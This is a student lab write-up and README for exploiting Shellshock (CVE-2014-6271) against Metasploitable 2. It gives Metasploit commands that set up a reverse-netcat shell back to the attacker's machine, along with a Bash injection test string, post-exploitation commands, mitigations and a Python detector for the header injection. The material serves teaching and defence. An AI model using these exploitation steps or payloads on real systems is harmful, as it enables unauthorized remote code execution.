# 🐚 Shellshock (CVE-2014-6271) – Exploitation & Analysis
## 📌 Overview
This is the practical assignment for **Vulnerability Assessment and Penetration Testing – II**, focusing on the exploitation and analysis of the **Shellshock vulnerability** (**CVE-2014-6271**).
The work was conducted in a **controlled lab environment** using **Metasploitable 2** (target) and **Kali Linux** (attacker).
---
## 🛠 Tools Used
- 💻 **Kali Linux** – Attacker machine
- 🖥 **Metasploitable 2** – Vulnerable target
- 🔍 **Nmap** – Scanning & service detection
- 🎯 **Metasploit Framework** – Exploitation
---
## 🔍 Vulnerability Summary
- **Type:** Remote Code Execution (RCE)
- **Affected Component:** GNU Bash (versions 1.14–4.3)
- **Impact:** Execute arbitrary commands via specially crafted environment variables
- **CVSS Score:** 10.0 (**Critical**)
- **Exploitation Vector:** Often through HTTP headers to CGI scripts
---
## ⚡ Lab Steps
### 1️⃣ Scan Target
```bash
nmap -sS -sV <target-ip>
```
### 2️⃣ Start Metasploit
```bash
msfconsole
```
### 3️⃣ Load Exploit Module
```
use exploit/multi/http/apache_mod_cgi_bash_env_exec
```
### 4️⃣ Configure Exploit
```
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
```
### 5️⃣ Run Exploit
```
exploit
```
---
## 📸 Demonstration Includes
- 📡 Nmap scan results
- ⚙️ Metasploit configuration
- 🔄 Reverse shell session output
- 🛠 Post-exploitation commands:
```bash
whoami
uname -a
ifconfig
```
---
## 📖 Theoretical Background
### What is Shellshock?
Shellshock is a vulnerability in the GNU Bash shell that allows attackers to execute arbitrary commands by injecting them into environment variables.
Discovered in September 2014 and assigned CVE-2014-6271, it affects Bash v1.14 to v4.3.
### How It Works
When Bash imports a function definition from an environment variable, it does not stop parsing at the end of the function body, so any commands appended after the closing brace are executed as soon as the shell starts.
In web servers using CGI scripts, HTTP headers become environment variables of the script's process, creating an easy attack path.
Example:
```bash
env x='() { :;}; echo vulnerable' bash -c "echo test"
```
If the Bash binary is vulnerable, the output includes the word `vulnerable`; a patched Bash does not run the trailing command.
### Impact
- Full Remote Code Execution (RCE) without authentication
- Exploitable via simple HTTP requests
- Used in botnets, worms, targeted attacks
- Affected millions of servers, routers, and IoT devices
### Real-World Exploits
- **Yahoo Servers** – Malware via CGI scripts
- **Wopbot Botnet** – Automated exploitation
- **QNAP NAS** – Remote shell access & malware
- **Self-Replicating Worms** – Spread to new vulnerable hosts
---
## 🛡 Prevention & Mitigation
- 🔄 Update Bash immediately
- 🚫 Disable unused CGI scripts
- 🔥 Use firewalls to block unnecessary traffic
- 🛡 Deploy Web Application Firewalls (WAF)
- 📜 Monitor HTTP request logs
- 👤 Apply Least Privilege principles
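To tie the "How It Works" section to the "Monitor HTTP request logs" mitigation, the following is an added example written for this README (it is not part of the original assignment or of any project the write-up uses). It shows how a CGI gateway turns HTTP headers into environment variable names (the path by which a header reaches Bash as `HTTP_USER_AGENT`), flags header values that carry the Bash function-definition prefix before a child process is spawned, and runs the same check over Apache "combined" access-log lines. The log lines, IP addresses and header values are constructed for the example; the regular expressions and field names are the author's assumptions about a standard combined `LogFormat`.

```python
"""Defensive helpers for Shellshock (CVE-2014-6271).

Constructed example for this write-up, not code from the assignment:
  * cgi_env_name / cgi_environment show how a CGI gateway turns HTTP
    headers into environment variables (the path that reaches Bash);
  * looks_like_shellshock / tainted_env_vars flag values that carry the
    Bash function-definition prefix before a child process is spawned;
  * scan_access_log applies the same check to Apache "combined" log lines.
"""
import re
from typing import Dict, List, Optional

# An exported Bash function starts with "() {". Bash's parser tolerates
# whitespace between the parentheses and the brace, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def cgi_env_name(header: str) -> str:
    """Map an HTTP header name to its CGI meta-variable name (RFC 3875):
    uppercase, '-' replaced by '_', prefixed with HTTP_. Content-Type and
    Content-Length are carried without the prefix."""
    norm = header.strip().upper().replace("-", "_")
    if norm in ("CONTENT_TYPE", "CONTENT_LENGTH"):
        return norm
    return "HTTP_" + norm


def cgi_environment(headers: Dict[str, str]) -> Dict[str, str]:
    """Environment a CGI handler would pass to the script's process.
    A User-Agent header arrives in Bash as HTTP_USER_AGENT."""
    return {cgi_env_name(name): value for name, value in headers.items()}


def looks_like_shellshock(value: str) -> bool:
    """True if the value contains a Bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def tainted_env_vars(headers: Dict[str, str]) -> List[str]:
    """Names of the CGI variables a gateway should refuse to export."""
    return [name for name, value in cgi_environment(headers).items()
            if looks_like_shellshock(value)]


# Apache "combined" LogFormat (assumed). Quoted fields may contain \" escapes.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)


def parse_combined_log_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it
    does not match (the scanner skips such lines rather than guessing)."""
    match = LOG_RE.match(line.rstrip("\n"))
    return match.groupdict() if match else None


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per log line whose request line, Referer or User-Agent
    carries the prefix. Only the headers Apache logs are visible here; a
    custom LogFormat is needed to capture others (e.g. Cookie)."""
    findings = []
    for line in lines:
        record = parse_combined_log_line(line)
        if record is None:
            continue
        for field in ("request", "referer", "ua"):
            if looks_like_shellshock(record[field]):
                findings.append({"ip": record["ip"], "ts": record["ts"],
                                 "field": field, "value": record[field]})
                break
    return findings


# Constructed sample lines, not real traffic. IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; echo vulnerable"',
    '198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [25/Sep/2014:10:02:30 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "() { :; }; echo probe" "curl/7.38.0"',
]

if __name__ == "__main__":
    print(tainted_env_vars({"User-Agent": "() { :;}; echo vulnerable",
                            "Host": "lab.example"}))
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The pattern is deliberately loose (any `()` followed by `{`, with optional whitespace) because the Bash parser accepts that spacing; a WAF or log rule that matches only the exact string `() {` misses trivially reformatted probes. Only the request line, Referer and User-Agent appear in the default combined format, so a gateway-side check such as `tainted_env_vars`, which sees every header, is the stronger control; the log scan is the retrospective one.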
---
## ⚠️ Disclaimer
This project is for educational purposes only.
All testing was in a controlled lab environment.
❌ Do NOT use these techniques on systems without permission.
---
- 👨💻 **Author:** Janith Madhusankha
- 🎓 **Course:** BICT (Hons) in Network & Security
- 🏫 **Institution:** South Eastern University of Sri Lanka